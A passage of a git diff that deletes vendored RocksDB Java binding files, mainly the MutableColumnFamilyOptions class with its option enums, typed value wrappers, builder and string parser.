- * Java developers to use it.
- *
- * To make a RocksDB to use a specific MemTable format, its associated
- * MemTableConfig should be properly set and passed into Options
- * via Options.setMemTableFactory() and open the db using that Options.
- *
- * @see Options
- */
-public abstract class MemTableConfig {
-  /**
-   * This function should only be called by Options.setMemTableConfig(),
-   * which will create a c++ shared-pointer to the c++ MemTableRepFactory
-   * that associated with the Java MemTableConfig.
-   *
-   * @see Options#setMemTableConfig(MemTableConfig)
-   *
-   * @return native handle address to native memory table instance.
-   */
-  abstract protected long newMemTableFactoryHandle();
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MergeOperator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MergeOperator.java
deleted file mode 100644
index 296527f..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MergeOperator.java
+++ /dev/null
@@ -1,17 +0,0 @@
-// Copyright (c) 2014, Vlad Balan (vlad.gm@gmail.com).  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * MergeOperator holds an operator to be applied when compacting
- * two merge operands held under the same key in order to obtain a single
- * value.
- */
-public abstract class MergeOperator extends RocksObject {
-    protected MergeOperator(final long nativeHandle) {
-        super(nativeHandle);
-    }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MutableColumnFamilyOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MutableColumnFamilyOptions.java
deleted file mode 100644
index 3585318..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MutableColumnFamilyOptions.java
+++ /dev/null
@@ -1,997 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.*;
-
-public class MutableColumnFamilyOptions {
-  private final static String KEY_VALUE_PAIR_SEPARATOR = ";";
-  private final static char KEY_VALUE_SEPARATOR = '=';
-  private final static String INT_ARRAY_INT_SEPARATOR = ",";
-
-  private final String[] keys;
-  private final String[] values;
-
-  // user must use builder pattern, or parser
-  private MutableColumnFamilyOptions(final String keys[],
-      final String values[]) {
-    this.keys = keys;
-    this.values = values;
-  }
-
-  String[] getKeys() {
-    return keys;
-  }
-
-  String[] getValues() {
-    return values;
-  }
-
-  /**
-   * Creates a builder which allows you
-   * to set MutableColumnFamilyOptions in a fluent
-   * manner
-   *
-   * @return A builder for MutableColumnFamilyOptions
-   */
-  public static MutableColumnFamilyOptionsBuilder builder() {
-    return new MutableColumnFamilyOptionsBuilder();
-  }
-
-  /**
-   * Parses a String representation of MutableColumnFamilyOptions
-   *
-   * The format is: key1=value1;key2=value2;key3=value3 etc
-   *
-   * For int[] values, each int should be separated by a comma, e.g.
-   *
-   * key1=value1;intArrayKey1=1,2,3
-   *
-   * @param str The string representation of the mutable column family options
-   *
-   * @return A builder for the mutable column family options
-   */
-  public static MutableColumnFamilyOptionsBuilder parse(final String str) {
-    Objects.requireNonNull(str);
-
-    final MutableColumnFamilyOptionsBuilder builder =
-        new MutableColumnFamilyOptionsBuilder();
-
-    final String options[] = str.trim().split(KEY_VALUE_PAIR_SEPARATOR);
-    for(final String option : options) {
-      final int equalsOffset = option.indexOf(KEY_VALUE_SEPARATOR);
-      if(equalsOffset <= 0) {
-        throw new IllegalArgumentException(
-            "options string has an invalid key=value pair");
-      }
-
-      final String key = option.substring(0, equalsOffset);
-      if(key == null || key.isEmpty()) {
-        throw new IllegalArgumentException("options string is invalid");
-      }
-
-      final String value = option.substring(equalsOffset + 1);
-      if(value == null || value.isEmpty()) {
-        throw new IllegalArgumentException("options string is invalid");
-      }
-
-      builder.fromString(key, value);
-    }
-
-    return builder;
-  }
-
-  /**
-   * Returns a string representation
-   * of MutableColumnFamilyOptions which is
-   * suitable for consumption by {@link #parse(String)}
-   *
-   * @return String representation of MutableColumnFamilyOptions
-   */
-  @Override
-  public String toString() {
-    final StringBuilder buffer = new StringBuilder();
-    for(int i = 0; i < keys.length; i++) {
-      buffer
-          .append(keys[i])
-          .append(KEY_VALUE_SEPARATOR)
-          .append(values[i]);
-
-      if(i + 1 < keys.length) {
-        buffer.append(KEY_VALUE_PAIR_SEPARATOR);
-      }
-    }
-    return buffer.toString();
-  }
-
-  public enum ValueType {
-    DOUBLE,
-    LONG,
-    INT,
-    BOOLEAN,
-    INT_ARRAY,
-    ENUM
-  }
-
-  public enum MemtableOption implements MutableColumnFamilyOptionKey {
-    write_buffer_size(ValueType.LONG),
-    arena_block_size(ValueType.LONG),
-    memtable_prefix_bloom_size_ratio(ValueType.DOUBLE),
-    @Deprecated memtable_prefix_bloom_bits(ValueType.INT),
-    @Deprecated memtable_prefix_bloom_probes(ValueType.INT),
-    memtable_huge_page_size(ValueType.LONG),
-    max_successive_merges(ValueType.LONG),
-    @Deprecated filter_deletes(ValueType.BOOLEAN),
-    max_write_buffer_number(ValueType.INT),
-    inplace_update_num_locks(ValueType.LONG);
-
-    private final ValueType valueType;
-    MemtableOption(final ValueType valueType) {
-      this.valueType = valueType;
-    }
-
-    @Override
-    public ValueType getValueType() {
-      return valueType;
-    }
-  }
-
-  public enum CompactionOption implements MutableColumnFamilyOptionKey {
-    disable_auto_compactions(ValueType.BOOLEAN),
-    @Deprecated soft_rate_limit(ValueType.DOUBLE),
-    soft_pending_compaction_bytes_limit(ValueType.LONG),
-    @Deprecated hard_rate_limit(ValueType.DOUBLE),
-    hard_pending_compaction_bytes_limit(ValueType.LONG),
-    level0_file_num_compaction_trigger(ValueType.INT),
-    level0_slowdown_writes_trigger(ValueType.INT),
-    level0_stop_writes_trigger(ValueType.INT),
-    max_compaction_bytes(ValueType.LONG),
-    target_file_size_base(ValueType.LONG),
-    target_file_size_multiplier(ValueType.INT),
-    max_bytes_for_level_base(ValueType.LONG),
-    max_bytes_for_level_multiplier(ValueType.INT),
-    max_bytes_for_level_multiplier_additional(ValueType.INT_ARRAY);
-
-    private final ValueType valueType;
-    CompactionOption(final ValueType valueType) {
-      this.valueType = valueType;
-    }
-
-    @Override
-    public ValueType getValueType() {
-      return valueType;
-    }
-  }
-
-  public enum MiscOption implements MutableColumnFamilyOptionKey {
-    max_sequential_skip_in_iterations(ValueType.LONG),
-    paranoid_file_checks(ValueType.BOOLEAN),
-    report_bg_io_stats(ValueType.BOOLEAN),
-    compression_type(ValueType.ENUM);
-
-    private final ValueType valueType;
-    MiscOption(final ValueType valueType) {
-      this.valueType = valueType;
-    }
-
-    @Override
-    public ValueType getValueType() {
-      return valueType;
-    }
-  }
-
-  private interface MutableColumnFamilyOptionKey {
-    String name();
-    ValueType getValueType();
-  }
-
-  private static abstract class MutableColumnFamilyOptionValue<T> {
-    protected final T value;
-
-    MutableColumnFamilyOptionValue(final T value) {
-      this.value = value;
-    }
-
-    abstract double asDouble() throws NumberFormatException;
-    abstract long asLong() throws NumberFormatException;
-    abstract int asInt() throws NumberFormatException;
-    abstract boolean asBoolean() throws IllegalStateException;
-    abstract int[] asIntArray() throws IllegalStateException;
-    abstract String asString();
-    abstract T asObject();
-  }
-
-  private static class MutableColumnFamilyOptionStringValue
-      extends MutableColumnFamilyOptionValue<String> {
-    MutableColumnFamilyOptionStringValue(final String value) {
-      super(value);
-    }
-
-    @Override
-    double asDouble() throws NumberFormatException {
-      return Double.parseDouble(value);
-    }
-
-    @Override
-    long asLong() throws NumberFormatException {
-      return Long.parseLong(value);
-    }
-
-    @Override
-    int asInt() throws NumberFormatException {
-      return Integer.parseInt(value);
-    }
-
-    @Override
-    boolean asBoolean() throws IllegalStateException {
-      return Boolean.parseBoolean(value);
-    }
-
-    @Override
-    int[] asIntArray() throws IllegalStateException {
-      throw new IllegalStateException("String is not applicable as int[]");
-    }
-
-    @Override
-    String asString() {
-      return value;
-    }
-
-    @Override
-    String asObject() {
-      return value;
-    }
-  }
-
-  private static class MutableColumnFamilyOptionDoubleValue
-      extends MutableColumnFamilyOptionValue<Double> {
-    MutableColumnFamilyOptionDoubleValue(final double value) {
-      super(value);
-    }
-
-    @Override
-    double asDouble() {
-      return value;
-    }
-
-    @Override
-    long asLong() throws NumberFormatException {
-      return value.longValue();
-    }
-
-    @Override
-    int asInt() throws NumberFormatException {
-      if(value > Integer.MAX_VALUE || value < Integer.MIN_VALUE) {
-        throw new NumberFormatException(
-            "double value lies outside the bounds of int");
-      }
-      return value.intValue();
-    }
-
-    @Override
-    boolean asBoolean() throws IllegalStateException {
-      throw new IllegalStateException(
-          "double is not applicable as boolean");
-    }
-
-    @Override
-    int[] asIntArray() throws IllegalStateException {
-      if(value > Integer.MAX_VALUE || value < Integer.MIN_VALUE) {
-        throw new NumberFormatException(
-            "double value lies outside the bounds of int");
-      }
-      return new int[] { value.intValue() };
-    }
-
-    @Override
-    String asString() {
-      return Double.toString(value);
-    }
-
-    @Override
-    Double asObject() {
-      return value;
-    }
-  }
-
-  private static class MutableColumnFamilyOptionLongValue
-      extends MutableColumnFamilyOptionValue<Long> {
-    MutableColumnFamilyOptionLongValue(final long value) {
-      super(value);
-    }
-
-    @Override
-    double asDouble() {
-      if(value > Double.MAX_VALUE || value < Double.MIN_VALUE) {
-        throw new NumberFormatException(
-            "long value lies outside the bounds of int");
-      }
-      return value.doubleValue();
-    }
-
-    @Override
-    long asLong() throws NumberFormatException {
-      return value;
-    }
-
-    @Override
-    int asInt() throws NumberFormatException {
-      if(value > Integer.MAX_VALUE || value < Integer.MIN_VALUE) {
-        throw new NumberFormatException(
-            "long value lies outside the bounds of int");
-      }
-      return value.intValue();
-    }
-
-    @Override
-    boolean asBoolean() throws IllegalStateException {
-      throw new IllegalStateException(
-          "long is not applicable as boolean");
-    }
-
-    @Override
-    int[] asIntArray() throws IllegalStateException {
-      if(value > Integer.MAX_VALUE || value < Integer.MIN_VALUE) {
-        throw new NumberFormatException(
-            "long value lies outside the bounds of int");
-      }
-      return new int[] { value.intValue() };
-    }
-
-    @Override
-    String asString() {
-      return Long.toString(value);
-    }
-
-    @Override
-    Long asObject() {
-      return value;
-    }
-  }
-
-  private static class MutableColumnFamilyOptionIntValue
-      extends MutableColumnFamilyOptionValue<Integer> {
-    MutableColumnFamilyOptionIntValue(final int value) {
-      super(value);
-    }
-
-    @Override
-    double asDouble() {
-      if(value > Double.MAX_VALUE || value < Double.MIN_VALUE) {
-        throw new NumberFormatException("int value lies outside the bounds of int");
-      }
-      return value.doubleValue();
-    }
-
-    @Override
-    long asLong() throws NumberFormatException {
-      return value;
-    }
-
-    @Override
-    int asInt() throws NumberFormatException {
-      return value;
-    }
-
-    @Override
-    boolean asBoolean() throws IllegalStateException {
-      throw new IllegalStateException("int is not applicable as boolean");
-    }
-
-    @Override
-    int[] asIntArray() throws IllegalStateException {
-      return new int[] { value };
-    }
-
-    @Override
-    String asString() {
-      return Integer.toString(value);
-    }
-
-    @Override
-    Integer asObject() {
-      return value;
-    }
-  }
-
-  private static class MutableColumnFamilyOptionBooleanValue
-      extends MutableColumnFamilyOptionValue<Boolean> {
-    MutableColumnFamilyOptionBooleanValue(final boolean value) {
-      super(value);
-    }
-
-    @Override
-    double asDouble() {
-      throw new NumberFormatException("boolean is not applicable as double");
-    }
-
-    @Override
-    long asLong() throws NumberFormatException {
-      throw new NumberFormatException("boolean is not applicable as Long");
-    }
-
-    @Override
-    int asInt() throws NumberFormatException {
-      throw new NumberFormatException("boolean is not applicable as int");
-    }
-
-    @Override
-    boolean asBoolean() {
-      return value;
-    }
-
-    @Override
-    int[] asIntArray() throws IllegalStateException {
-      throw new IllegalStateException("boolean is not applicable as int[]");
-    }
-
-    @Override
-    String asString() {
-      return Boolean.toString(value);
-    }
-
-    @Override
-    Boolean asObject() {
-      return value;
-    }
-  }
-
-  private static class MutableColumnFamilyOptionIntArrayValue
-      extends MutableColumnFamilyOptionValue<int[]> {
-    MutableColumnFamilyOptionIntArrayValue(final int[] value) {
-      super(value);
-    }
-
-    @Override
-    double asDouble() {
-      throw new NumberFormatException("int[] is not applicable as double");
-    }
-
-    @Override
-    long asLong() throws NumberFormatException {
-      throw new NumberFormatException("int[] is not applicable as Long");
-    }
-
-    @Override
-    int asInt() throws NumberFormatException {
-      throw new NumberFormatException("int[] is not applicable as int");
-    }
-
-    @Override
-    boolean asBoolean() {
-      throw new NumberFormatException("int[] is not applicable as boolean");
-    }
-
-    @Override
-    int[] asIntArray() throws IllegalStateException {
-      return value;
-    }
-
-    @Override
-    String asString() {
-      final StringBuilder builder = new StringBuilder();
-      for(int i = 0; i < value.length; i++) {
-        builder.append(Integer.toString(i));
-        if(i + 1 < value.length) {
-          builder.append(INT_ARRAY_INT_SEPARATOR);
-        }
-      }
-      return builder.toString();
-    }
-
-    @Override
-    int[] asObject() {
-      return value;
-    }
-  }
-
-  private static class MutableColumnFamilyOptionEnumValue<T extends Enum<T>>
-      extends MutableColumnFamilyOptionValue<T> {
-
-    MutableColumnFamilyOptionEnumValue(final T value) {
-      super(value);
-    }
-
-    @Override
-    double asDouble() throws NumberFormatException {
-      throw new NumberFormatException("Enum is not applicable as double");
-    }
-
-    @Override
-    long asLong() throws NumberFormatException {
-      throw new NumberFormatException("Enum is not applicable as long");
-    }
-
-    @Override
-    int asInt() throws NumberFormatException {
-      throw new NumberFormatException("Enum is not applicable as int");
-    }
-
-    @Override
-    boolean asBoolean() throws IllegalStateException {
-      throw new NumberFormatException("Enum is not applicable as boolean");
-    }
-
-    @Override
-    int[] asIntArray() throws IllegalStateException {
-      throw new NumberFormatException("Enum is not applicable as int[]");
-    }
-
-    @Override
-    String asString() {
-      return value.name();
-    }
-
-    @Override
-    T asObject() {
-      return value;
-    }
-  }
-
-  public static class MutableColumnFamilyOptionsBuilder
-      implements MutableColumnFamilyOptionsInterface {
-
-    private final static Map<String, MutableColumnFamilyOptionKey> ALL_KEYS_LOOKUP = new HashMap<>();
-    static {
-      for(final MutableColumnFamilyOptionKey key : MemtableOption.values()) {
-        ALL_KEYS_LOOKUP.put(key.name(), key);
-      }
-
-      for(final MutableColumnFamilyOptionKey key : CompactionOption.values()) {
-        ALL_KEYS_LOOKUP.put(key.name(), key);
-      }
-
-      for(final MutableColumnFamilyOptionKey key : MiscOption.values()) {
-        ALL_KEYS_LOOKUP.put(key.name(), key);
-      }
-    }
-
-    private final Map<MutableColumnFamilyOptionKey, MutableColumnFamilyOptionValue<?>> options = new LinkedHashMap<>();
-
-    public MutableColumnFamilyOptions build() {
-      final String keys[] = new String[options.size()];
-      final String values[] = new String[options.size()];
-
-      int i = 0;
-      for(final Map.Entry<MutableColumnFamilyOptionKey, MutableColumnFamilyOptionValue<?>> option : options.entrySet()) {
-        keys[i] = option.getKey().name();
-        values[i] = option.getValue().asString();
-        i++;
-      }
-
-      return new MutableColumnFamilyOptions(keys, values);
-    }
-
-    private MutableColumnFamilyOptionsBuilder setDouble(
-        final MutableColumnFamilyOptionKey key, final double value) {
-      if(key.getValueType() != ValueType.DOUBLE) {
-        throw new IllegalArgumentException(
-            key + " does not accept a double value");
-      }
-      options.put(key, new MutableColumnFamilyOptionDoubleValue(value));
-      return this;
-    }
-
-    private double getDouble(final MutableColumnFamilyOptionKey key)
-        throws NoSuchElementException, NumberFormatException {
-      final MutableColumnFamilyOptionValue<?> value = options.get(key);
-      if(value == null) {
-        throw new NoSuchElementException(key.name() + " has not been set");
-      }
-      return value.asDouble();
-    }
-
-    private MutableColumnFamilyOptionsBuilder setLong(
-        final MutableColumnFamilyOptionKey key, final long value) {
-      if(key.getValueType() != ValueType.LONG) {
-        throw new IllegalArgumentException(
-            key + " does not accept a long value");
-      }
-      options.put(key, new MutableColumnFamilyOptionLongValue(value));
-      return this;
-    }
-
-    private long getLong(final MutableColumnFamilyOptionKey key)
-        throws NoSuchElementException, NumberFormatException {
-      final MutableColumnFamilyOptionValue<?> value = options.get(key);
-      if(value == null) {
-        throw new NoSuchElementException(key.name() + " has not been set");
-      }
-      return value.asLong();
-    }
-
-    private MutableColumnFamilyOptionsBuilder setInt(
-        final MutableColumnFamilyOptionKey key, final int value) {
-      if(key.getValueType() != ValueType.INT) {
-        throw new IllegalArgumentException(
-            key + " does not accept an integer value");
-      }
-      options.put(key, new MutableColumnFamilyOptionIntValue(value));
-      return this;
-    }
-
-    private int getInt(final MutableColumnFamilyOptionKey key)
-        throws NoSuchElementException, NumberFormatException {
-      final MutableColumnFamilyOptionValue<?> value = options.get(key);
-      if(value == null) {
-        throw new NoSuchElementException(key.name() + " has not been set");
-      }
-      return value.asInt();
-    }
-
-    private MutableColumnFamilyOptionsBuilder setBoolean(
-        final MutableColumnFamilyOptionKey key, final boolean value) {
-      if(key.getValueType() != ValueType.BOOLEAN) {
-        throw new IllegalArgumentException(
-            key + " does not accept a boolean value");
-      }
-      options.put(key, new MutableColumnFamilyOptionBooleanValue(value));
-      return this;
-    }
-
-    private boolean getBoolean(final MutableColumnFamilyOptionKey key)
-        throws NoSuchElementException, NumberFormatException {
-      final MutableColumnFamilyOptionValue<?> value = options.get(key);
-      if(value == null) {
-        throw new NoSuchElementException(key.name() + " has not been set");
-      }
-      return value.asBoolean();
-    }
-
-    private MutableColumnFamilyOptionsBuilder setIntArray(
-        final MutableColumnFamilyOptionKey key, final int[] value) {
-      if(key.getValueType() != ValueType.INT_ARRAY) {
-        throw new IllegalArgumentException(
-            key + " does not accept an int array value");
-      }
-      options.put(key, new MutableColumnFamilyOptionIntArrayValue(value));
-      return this;
-    }
-
-    private int[] getIntArray(final MutableColumnFamilyOptionKey key)
-        throws NoSuchElementException, NumberFormatException {
-      final MutableColumnFamilyOptionValue<?> value = options.get(key);
-      if(value == null) {
-        throw new NoSuchElementException(key.name() + " has not been set");
-      }
-      return value.asIntArray();
-    }
-
-    private <T extends Enum<T>> MutableColumnFamilyOptionsBuilder setEnum(
-        final MutableColumnFamilyOptionKey key, final T value) {
-      if(key.getValueType() != ValueType.ENUM) {
-        throw new IllegalArgumentException(
-            key + " does not accept a Enum value");
-      }
-      options.put(key, new MutableColumnFamilyOptionEnumValue<T>(value));
-      return this;
-
-    }
-
-    private <T extends Enum<T>> T getEnum(final MutableColumnFamilyOptionKey key)
-        throws NoSuchElementException, NumberFormatException {
-      final MutableColumnFamilyOptionValue<?> value = options.get(key);
-      if(value == null) {
-        throw new NoSuchElementException(key.name() + " has not been set");
-      }
-
-      if(!(value instanceof MutableColumnFamilyOptionEnumValue)) {
-        throw new NoSuchElementException(key.name() + " is not of Enum type");
-      }
-
-      return ((MutableColumnFamilyOptionEnumValue<T>)value).asObject();
-    }
-
-    public MutableColumnFamilyOptionsBuilder fromString(final String keyStr,
-        final String valueStr) throws IllegalArgumentException {
-      Objects.requireNonNull(keyStr);
-      Objects.requireNonNull(valueStr);
-
-      final MutableColumnFamilyOptionKey key = ALL_KEYS_LOOKUP.get(keyStr);
-      switch(key.getValueType()) {
-        case DOUBLE:
-          return setDouble(key, Double.parseDouble(valueStr));
-
-        case LONG:
-          return setLong(key, Long.parseLong(valueStr));
-
-        case INT:
-          return setInt(key, Integer.parseInt(valueStr));
-
-        case BOOLEAN:
-          return setBoolean(key, Boolean.parseBoolean(valueStr));
-
-        case INT_ARRAY:
-          final String[] strInts = valueStr
-              .trim().split(INT_ARRAY_INT_SEPARATOR);
-          if(strInts == null || strInts.length == 0) {
-            throw new IllegalArgumentException(
-                "int array value is not correctly formatted");
-          }
-
-          final int value[] = new int[strInts.length];
-          int i = 0;
-          for(final String strInt : strInts) {
-            value[i++] = Integer.parseInt(strInt);
-          }
-          return setIntArray(key, value);
-      }
-
-      throw new IllegalStateException(
-          key + " has unknown value type: " + key.getValueType());
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setWriteBufferSize(
-        final long writeBufferSize) {
-      return setLong(MemtableOption.write_buffer_size, writeBufferSize);
-    }
-
-    @Override
-    public long writeBufferSize() {
-      return getLong(MemtableOption.write_buffer_size);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setArenaBlockSize(
-        final long arenaBlockSize) {
-      return setLong(MemtableOption.arena_block_size, arenaBlockSize);
-    }
-
-    @Override
-    public long arenaBlockSize() {
-      return getLong(MemtableOption.arena_block_size);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setMemtablePrefixBloomSizeRatio(
-        final double memtablePrefixBloomSizeRatio) {
-      return setDouble(MemtableOption.memtable_prefix_bloom_size_ratio,
-          memtablePrefixBloomSizeRatio);
-    }
-
-    @Override
-    public double memtablePrefixBloomSizeRatio() {
-      return getDouble(MemtableOption.memtable_prefix_bloom_size_ratio);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setMemtableHugePageSize(
-        final long memtableHugePageSize) {
-      return setLong(MemtableOption.memtable_huge_page_size,
-          memtableHugePageSize);
-    }
-
-    @Override
-    public long memtableHugePageSize() {
-      return getLong(MemtableOption.memtable_huge_page_size);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setMaxSuccessiveMerges(
-        final long maxSuccessiveMerges) {
-      return setLong(MemtableOption.max_successive_merges, maxSuccessiveMerges);
-    }
-
-    @Override
-    public long maxSuccessiveMerges() {
-      return getLong(MemtableOption.max_successive_merges);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setMaxWriteBufferNumber(
-        final int maxWriteBufferNumber) {
-      return setInt(MemtableOption.max_write_buffer_number,
-          maxWriteBufferNumber);
-    }
-
-    @Override
-    public int maxWriteBufferNumber() {
-      return getInt(MemtableOption.max_write_buffer_number);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setInplaceUpdateNumLocks(
-        final long inplaceUpdateNumLocks) {
-      return setLong(MemtableOption.inplace_update_num_locks,
-          inplaceUpdateNumLocks);
-    }
-
-    @Override
-    public long inplaceUpdateNumLocks() {
-      return getLong(MemtableOption.inplace_update_num_locks);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setDisableAutoCompactions(
-        final boolean disableAutoCompactions) {
-      return setBoolean(CompactionOption.disable_auto_compactions,
-          disableAutoCompactions);
-    }
-
-    @Override
-    public boolean disableAutoCompactions() {
-      return getBoolean(CompactionOption.disable_auto_compactions);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setSoftPendingCompactionBytesLimit(
-        final long softPendingCompactionBytesLimit) {
-      return setLong(CompactionOption.soft_pending_compaction_bytes_limit,
-          softPendingCompactionBytesLimit);
-    }
-
-    @Override
-    public long softPendingCompactionBytesLimit() {
-      return getLong(CompactionOption.soft_pending_compaction_bytes_limit);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setHardPendingCompactionBytesLimit(
-        final long hardPendingCompactionBytesLimit) {
-      return setLong(CompactionOption.hard_pending_compaction_bytes_limit,
-          hardPendingCompactionBytesLimit);
-    }
-
-    @Override
-    public long hardPendingCompactionBytesLimit() {
-      return getLong(CompactionOption.hard_pending_compaction_bytes_limit);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setLevel0FileNumCompactionTrigger(
-        final int level0FileNumCompactionTrigger) {
-      return setInt(CompactionOption.level0_file_num_compaction_trigger,
-          level0FileNumCompactionTrigger);
-    }
-
-    @Override
-    public int level0FileNumCompactionTrigger() {
-      return getInt(CompactionOption.level0_file_num_compaction_trigger);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setLevel0SlowdownWritesTrigger(
-        final int level0SlowdownWritesTrigger) {
-      return setInt(CompactionOption.level0_slowdown_writes_trigger,
-          level0SlowdownWritesTrigger);
-    }
-
-    @Override
-    public int level0SlowdownWritesTrigger() {
-      return getInt(CompactionOption.level0_slowdown_writes_trigger);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setLevel0StopWritesTrigger(
-        final int level0StopWritesTrigger) {
-      return setInt(CompactionOption.level0_stop_writes_trigger,
-          level0StopWritesTrigger);
-    }
-
-    @Override
-    public int level0StopWritesTrigger() {
-      return getInt(CompactionOption.level0_stop_writes_trigger);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setMaxCompactionBytes(final long maxCompactionBytes) {
-      return setLong(CompactionOption.max_compaction_bytes, maxCompactionBytes);
-    }
-
-    @Override
-    public long maxCompactionBytes() {
-      return getLong(CompactionOption.max_compaction_bytes);
-    }
-
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setTargetFileSizeBase(
-        final long targetFileSizeBase) {
-      return setLong(CompactionOption.target_file_size_base,
-          targetFileSizeBase);
-    }
-
-    @Override
-    public long targetFileSizeBase() {
-      return getLong(CompactionOption.target_file_size_base);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setTargetFileSizeMultiplier(
-        final int targetFileSizeMultiplier) {
-      return setInt(CompactionOption.target_file_size_multiplier,
-          targetFileSizeMultiplier);
-    }
-
-    @Override
-    public int targetFileSizeMultiplier() {
-      return getInt(CompactionOption.target_file_size_multiplier);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setMaxBytesForLevelBase(
-        final long maxBytesForLevelBase) {
-      return setLong(CompactionOption.max_bytes_for_level_base,
-          maxBytesForLevelBase);
-    }
-
-    @Override
-    public long maxBytesForLevelBase() {
-      return getLong(CompactionOption.max_bytes_for_level_base);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setMaxBytesForLevelMultiplier(
-        final double maxBytesForLevelMultiplier) {
-      return setDouble(CompactionOption.max_bytes_for_level_multiplier, maxBytesForLevelMultiplier);
-    }
-
-    @Override
-    public double maxBytesForLevelMultiplier() {
-      return getDouble(CompactionOption.max_bytes_for_level_multiplier);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setMaxBytesForLevelMultiplierAdditional(
-        final int[] maxBytesForLevelMultiplierAdditional) {
-      return setIntArray(
-          CompactionOption.max_bytes_for_level_multiplier_additional,
-          maxBytesForLevelMultiplierAdditional);
-    }
-
-    @Override
-    public int[] maxBytesForLevelMultiplierAdditional() {
-      return getIntArray(
-          CompactionOption.max_bytes_for_level_multiplier_additional);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setMaxSequentialSkipInIterations(
-        final long maxSequentialSkipInIterations) {
-      return setLong(MiscOption.max_sequential_skip_in_iterations,
-          maxSequentialSkipInIterations);
-    }
-
-    @Override
-    public long maxSequentialSkipInIterations() {
-      return getLong(MiscOption.max_sequential_skip_in_iterations);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setParanoidFileChecks(
-        final boolean paranoidFileChecks) {
-      return setBoolean(MiscOption.paranoid_file_checks, paranoidFileChecks);
-    }
-
-    @Override
-    public boolean paranoidFileChecks() {
-      return getBoolean(MiscOption.paranoid_file_checks);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setCompressionType(
-        final CompressionType compressionType) {
-      return setEnum(MiscOption.compression_type, compressionType);
-    }
-
-    @Override
-    public CompressionType compressionType() {
-      return (CompressionType)getEnum(MiscOption.compression_type);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setReportBgIoStats(
-        final boolean reportBgIoStats) {
-      return setBoolean(MiscOption.report_bg_io_stats, reportBgIoStats);
-    }
-
-    @Override
-    public boolean reportBgIoStats() {
-      return getBoolean(MiscOption.report_bg_io_stats);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MutableColumnFamilyOptionsInterface.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MutableColumnFamilyOptionsInterface.java
deleted file mode 100644
index c2efcc5..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MutableColumnFamilyOptionsInterface.java
+++ /dev/null
@@ -1,159 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-public interface MutableColumnFamilyOptionsInterface
-    <T extends MutableColumnFamilyOptionsInterface>
-        extends AdvancedMutableColumnFamilyOptionsInterface<T> {
-
-  /**
-   * Amount of data to build up in memory (backed by an unsorted log
-   * on disk) before converting to a sorted on-disk file.
-   *
-   * Larger values increase performance, especially during bulk loads.
-   * Up to {@code max_write_buffer_number} write buffers may be held in memory
-   * at the same time, so you may wish to adjust this parameter
-   * to control memory usage.
-   *
-   * Also, a larger write buffer will result in a longer recovery time
-   * the next time the database is opened.
-   *
-   * Default: 4MB
-   * @param writeBufferSize the size of write buffer.
-   * @return the instance of the current object.
-   * @throws java.lang.IllegalArgumentException thrown on 32-Bit platforms
-   *   while overflowing the underlying platform specific value.
-   */
-  MutableColumnFamilyOptionsInterface setWriteBufferSize(long writeBufferSize);
-
-  /**
-   * Return size of write buffer size.
-   *
-   * @return size of write buffer.
-   * @see #setWriteBufferSize(long)
-   */
-  long writeBufferSize();
-
-  /**
-   * Disable automatic compactions. Manual compactions can still
-   * be issued on this column family
-   *
-   * @param disableAutoCompactions true if auto-compactions are disabled.
-   * @return the reference to the current option.
-   */
-  MutableColumnFamilyOptionsInterface setDisableAutoCompactions(
-      boolean disableAutoCompactions);
-
-  /**
-   * Disable automatic compactions. Manual compactions can still
-   * be issued on this column family
-   *
-   * @return true if auto-compactions are disabled.
-   */
-  boolean disableAutoCompactions();
-
-  /**
-   * Number of files to trigger level-0 compaction. A value &lt; 0 means that
-   * level-0 compaction will not be triggered by number of files at all.
-   *
-   * Default: 4
-   *
-   * @param level0FileNumCompactionTrigger The number of files to trigger
-   *   level-0 compaction
-   * @return the reference to the current option.
-   */
